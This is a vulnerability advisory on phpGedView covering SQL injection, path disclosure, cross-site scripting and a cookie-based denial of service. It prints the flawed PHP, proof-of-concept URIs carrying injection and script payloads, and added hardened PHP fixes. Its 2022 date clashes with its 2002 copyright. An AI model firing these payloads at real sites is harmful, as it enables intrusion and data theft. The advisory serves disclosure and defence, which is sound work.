GulfTech Computers - Professional Computer Services  
Multiple Vulnerabilities In phpGedView
January 13, 2022


Vendor : phpGedView
URL : http://phpgedview.sourceforge.net
Version : 2.65 beta 5 > All Versions(??)
Risk : Multiple Vulnerabilities


Description:
The phpGedView project parses GEDCOM 5.5 genealogy files and displays them on the Internet in a format similar to PAF. All it requires to run is a php enabled web server and a gedcom file. It is easily customizable for use on many different web sites. It is one of the top 10 most popular projects at SourceForge.


SQL Injection Vulnerability:
phpGedView has a few files which are vulnerable to SQL injection; the vulnerable files are "timeline.php" and "placelist.php". The vulnerabilities are a result of input not being properly validated: the data given to these scripts is then placed into queries that are executed by the "functions_mysql.php" file. As we can see below, in the "get_place_list()" function the $parent_id variable as well as the $level variable are passed directly into the query without being sanitized by the script at all.

-----[ Begin Code ] -----------------------------------------------------------------
//-- find all of the places
function get_place_list() {
    global $numfound, $j, $level, $parent, $found;
    global $GEDCOM, $TBLPREFIX, $placelist, $positions;
    // --- find all of the place in the file
    // $level comes straight from the request and is interpolated into the SQL unescaped
    if ($level==0) $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=0 AND p_file='$GEDCOM' ORDER BY p_place";
    else {
        // $parent[$level-1] is also request-controlled and lands inside the LIKE '...' clause unescaped
        $psql = "SELECT p_id FROM ".$TBLPREFIX."places WHERE p_level=".($level-1)." AND p_place LIKE '".$parent[$level-1]."' AND p_file='$GEDCOM' ORDER BY p_place";
        $res = dbquery($psql);
        $row = mysql_fetch_row($res);
        $parent_id = $row[0];
        $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=$level AND p_parent_id=$parent_id AND p_file='$GEDCOM' ORDER BY p_place";
    }
    $res = dbquery($sql);
    while ($row = mysql_fetch_row($res)) {
        $placelist[] = stripslashes($row[0]);
        $numfound++;
    }
}
-------------------------------------------------------------------------------------

Below are some URIs which can be used to exploit the issue explained in the paragraph above. Also included is a URI that triggers a somewhat similar SQL vulnerability in the "timeline.php" script.

/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent[0]=[Evil_Query]
/placelist.php?level=2&parent[0]=&parent[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query]
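For comparison, here is how the same lookup can be written so that neither $level nor the $parent array can alter the query. This is an added example, not phpGedView's own code: it uses mysqli prepared statements in place of the dbquery()/mysql_fetch_row() calls shown above, keeps the table layout implied by the advisory's query ({prefix}places with p_id, p_place, p_level, p_parent_id and p_file), and assumes a connected mysqli handle $db and the function name get_place_list_safe().

```php
<?php
// Added example (not phpGedView's own code): a hardened get_place_list().
// Assumptions: $db is a connected mysqli handle; the places table has the
// columns used in the advisory's query; function name is illustrative.

function get_place_list_safe(mysqli $db, string $tblprefix, string $gedcom, $level, array $parent): array
{
    // level must be a small non-negative integer; anything else is rejected
    // instead of being interpolated into the SQL text.
    $level = filter_var($level, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 32]]);
    if ($level === false) {
        throw new InvalidArgumentException('level must be an integer between 0 and 32');
    }

    // The table prefix is configuration, not request data, but it cannot be
    // bound as a parameter, so restrict it to identifier characters anyway.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tblprefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $table = $tblprefix . 'places';

    if ($level === 0) {
        $stmt = $db->prepare(
            "SELECT p_place FROM $table WHERE p_level = 0 AND p_file = ? ORDER BY p_place");
        $stmt->bind_param('s', $gedcom);
    } else {
        // The parent place name is bound as data. The original interpolated it
        // directly into LIKE '...'; binding keeps LIKE semantics but removes injection.
        $parentName  = (string)($parent[$level - 1] ?? '');
        $parentLevel = $level - 1;
        $stmt = $db->prepare(
            "SELECT p_id FROM $table WHERE p_level = ? AND p_place LIKE ? AND p_file = ? ORDER BY p_place");
        $stmt->bind_param('iss', $parentLevel, $parentName, $gedcom);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_row();
        $stmt->close();
        if (!$row) {
            return [];   // unknown parent place: nothing to list
        }
        $parentId = (int)$row[0];   // an integer from the database, not from the request

        $stmt = $db->prepare(
            "SELECT p_place FROM $table WHERE p_level = ? AND p_parent_id = ? AND p_file = ? ORDER BY p_place");
        $stmt->bind_param('iis', $level, $parentId, $gedcom);
    }

    $stmt->execute();
    $result = $stmt->get_result();
    $places = [];
    while ($row = $result->fetch_row()) {
        $places[] = $row[0];
    }
    $stmt->close();
    return $places;
}
```

Two points worth noting: the LIKE comparison is kept only to preserve the original behaviour, so a parent value containing % or _ still acts as a wildcard (use = if exact matching is intended), and because every request-derived value travels as a bound parameter the "[Evil_Query]" payloads above become literal place names that simply match nothing.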


Path Disclosure Vulnerability:
There are a decent number of ways an attacker could disclose the full path of the web server, thus aiding in the information gathering process preceding an attack. Below is a list of the vulnerable scripts and proof of concept URIs to reproduce the condition.

/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id=Blah
/login.php?action=login
/login.php?&changelanguage=yes&NEWLANGUAGE=Blah
/gdbi.php?action=connect&username=Blah


Cross Site Scripting:
I have found over a dozen instances of Cross Site Scripting in phpGedView, but there are probably more. The impact of these vulnerabilities is self explanatory; they allow code execution in the context of the browser of someone viewing the malicious URI. Below are examples of the numerous XSS vulns.

/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual.php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1="><iframe>
/relationship.php?path_to_find=0&pid1=&pid2="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day=1&month=jan&year="><iframe>
/calendar.php?action=today&day=1&month=<iframe>
/calendar.php?action=today&day=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username="><iframe>
/login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>
/gdbi_interface.php?action=delete&pid=<iframe>


Denial Of Service:
It is also possible for an attacker to launch a DoS of sorts against a user who visits a certain URI. The vulnerability is in the language variable not being properly validated. If an attacker sends the following URI to a victim, they will not be able to access the phpGedView web site until they either clear their cookies or manually reset the language setting by typing in a valid URI that sets the language back to something acceptable.

/index.php?&changelanguage=yes&NEWLANGUAGE=[Junk_Here]

Or even one hundred million times more annoying is this :P

/index.php?&changelanguage=yes&NEWLANGUAGE=<script>var i=1; while(i){alert(i);};</script>

As I mentioned before though, it is possible to regain a normal session by manually typing in a value in the language variable that is acceptable to phpGedView.
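The XSS and Denial of Service findings above (and the path disclosure finding, to a lesser degree) share one root cause: request values are stored or echoed back without validation or encoding. The following added example, which is not phpGedView's own code, shows the defensive pattern for both: the NEWLANGUAGE value is checked against an allow-list before it is stored in the cookie, so junk can never wedge a session, and any value reflected into HTML goes through an encoding helper. The language list, the cookie name pgv_lang, the helper names select_language() and h(), and the sample request data are all constructed for the example.

```php
<?php
// Added example (not phpGedView's own code). Helpers for the XSS and DoS
// findings; names, cookie name and sample data are constructed.

// Path disclosure: errors go to the log, never to the browser.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Languages the site actually ships. Constructed list for the example.
$SUPPORTED_LANGUAGES = ['english', 'german', 'french'];

// Returns an allow-listed language, or $default when the requested value is
// missing or unknown. An unknown value is never stored, so the cookie can
// never hold something the site cannot render.
function select_language(?string $requested, array $supported, string $default = 'english'): string
{
    if ($requested === null) {
        return $default;
    }
    $requested = strtolower(trim($requested));
    return in_array($requested, $supported, true) ? $requested : $default;
}

// Encodes a value for insertion into HTML text or a double-quoted attribute.
function h($value): string
{
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed request data: the advisory's DoS payload plus a reflected id.
$_GET = [
    'changelanguage' => 'yes',
    'NEWLANGUAGE'    => '<script>var i=1; while(i){alert(i);};</script>',
    'rootid'         => '"><iframe>',
];

// The changelanguage flow with the allow-list applied.
if (($_GET['changelanguage'] ?? '') === 'yes') {
    $lang = select_language($_GET['NEWLANGUAGE'] ?? null, $SUPPORTED_LANGUAGES);
    // $lang is 'english' here: the payload was discarded, not stored.
    setcookie('pgv_lang', $lang, ['httponly' => true, 'samesite' => 'Lax']);
}

// A reflected value rendered safely in both attribute and text context.
$rootid = $_GET['rootid'] ?? '';
echo '<a href="individual.php?pid=' . h(urlencode($rootid)) . '">' . h($rootid) . "</a>\n";
```

The allow-list check is what removes the DoS: a victim who receives the junk URI simply ends up with the default language instead of a broken session. The encoding helper handles the reflected parameters listed in the XSS section; the URL component is additionally percent-encoded so the value cannot break out of the query string either.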


Solution:
These vulnerabilities have been addressed in the latest beta release. Users may obtain the latest beta version at http://sourceforge.net/project/showfiles.php?group_id=55456


Credits:
Credits go to JeiAr of the GulfTech Security Research Team.






© Copyright 2002 - GulfTech Computers, All Rights Reserved